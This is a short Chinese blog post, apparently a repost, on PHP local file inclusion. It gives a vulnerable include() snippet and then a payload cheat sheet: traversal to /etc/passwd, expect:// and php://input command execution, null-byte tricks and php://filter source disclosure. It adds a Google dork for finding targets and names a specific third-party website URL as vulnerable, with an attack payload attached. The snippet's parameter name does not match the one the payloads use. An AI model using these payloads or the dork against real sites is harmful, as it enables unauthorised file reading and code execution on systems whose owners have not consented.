LFI （local file inclusion vulnerability）本地文件包含

标签：pass   web   conf   文件   rabl   targe   etc   arp   include   

代码实例：

<?php

$file = $_GET[‘file‘];

if(isset($file))

{

include("pages/$file");

}

else

{

include("index.php");

}

?>

利用方式：

/script.php?page=../../../../../etc/passwd

php?page=expect://id

?page=/etc/passwd%00

?page=/etc/passwd%2500

warpper://target

?page=php://input&cmd=ls

page=php://filter/convert.base64-encode/resource=

google hacking

inurl:index.php?page=

vulnerable website：

http://confituredebali.com/index.php?page=../../../../../../../../etc/passwd

LFI （local file inclusion vulnerability）本地文件包含

标签：pass   web   conf   文件   rabl   targe   etc   arp   include   

原文地址：https://www.cnblogs.com/hack404/p/11258451.html